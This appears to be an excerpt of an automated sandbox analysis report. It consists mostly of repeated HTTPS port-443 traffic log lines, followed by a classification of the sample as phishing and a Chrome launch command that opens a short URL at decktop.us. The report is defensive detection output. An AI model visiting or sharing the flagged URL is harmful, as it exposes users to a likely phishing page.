      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
      Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
      Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
      Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
      Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
      Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
      Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
      Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
      Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
      Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
      Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
      Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
      Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
      Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.17:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49757 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49768 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.17:49930 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.190.159.64:443 -> 192.168.2.17:49941 version: TLS 1.2
      Source: classification engineClassification label: mal80.phis.win@19/98@162/706
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://decktop.us/LFzs8Q
